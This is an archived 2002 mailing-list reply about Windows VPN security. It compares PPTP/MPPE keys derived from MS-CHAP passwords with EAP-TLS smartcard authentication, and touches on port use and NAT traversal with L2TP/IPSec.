Re: PPTP/MPPE + Smartcards/EAP-TLS: Security?
From: S. Pidgorny [MVP] (slavickp@yahoo.com)
Date: 11/28/02
- Next message: S. Pidgorny [MVP]: "Re: Server Admin rights"
- Previous message: S. Pidgorny [MVP]: "Re: IAS/RADIUS with Cisco devices"
- In reply to: Alex: "PPTP/MPPE + Smartcards/EAP-TLS: Security?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "S. Pidgorny [MVP]" <slavickp@yahoo.com> Date: Thu, 28 Nov 2002 20:37:52 +1100
PPTP with MS-CHAPv2 seems to be allright, and you actually don't need to
open extra ports for CHAP - it's over PPTP control channel (1723/TCP).
And yes, smartcards are more secure - security is based on posession in
addition to knowledge :)
-- Svyatoslav Pidgorny, MS MVP, MCSE -= F1 is the key =- "Alex" <crolyon@hotmail.com> wrote in message news:9cb5d7e3.0211270945.7845e87d@posting.google.com... > Hello everyone, > > i am just wondering if anyone else has tried to analyze this. > - MPPE even with 128 bit keys in combination with MS-CHAP v1 or v2 has > some security flaws - the main weakness being the fact that the > master-keys for encryption are generated using the User's password. > This fact remains, although the generation process is pretty > complicated. Weak passwords make this system insecure. > - If combined with EAP-TLS, MPPE's master-keys are generated from the > so called master-secret, which was generated by the EAP-Server and > then sent in a secure way (using public-key mechanisms) from the > EAP-server to the client during the mutual Authentication with TLS. No > weak Password here. > (for details, take a look at RFC 3079 :-)) > > My conclusion: > TLS is regarded to be secure as far as i know. Thus the main weakness > of MPPE is solved by not using MS-CHAP but Smartcards. This means if i > already have a PKI and use Smartcards for Kerberos-Authentication with > W2k/XP i can create a pretty secure VPN with a Windows 2000 RRAS using > PPTP/MPPE 128 bit and EAP-TLS, right? ... and don't have to worry > about not being able to use NAT at all (as with IPSec/IKE > NAT-Traversal when using L2TP/IPSec now). > A solution with 1 RAS-Rule that permits PPTP _only_ in combination > with Smartcards and another Rule for L2TP/IPSec that also maybe allows > MS-Chap v2 seems to be ideal, if you generally want to use the better > L2TP/IPSec and PPTP just where NAT-Traversal is needed... at least > until .NET > > Any comments, thoughts, input is greatly appreciated :-) > > Alex
- Next message: S. Pidgorny [MVP]: "Re: Server Admin rights"
- Previous message: S. Pidgorny [MVP]: "Re: IAS/RADIUS with Cisco devices"
- In reply to: Alex: "PPTP/MPPE + Smartcards/EAP-TLS: Security?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
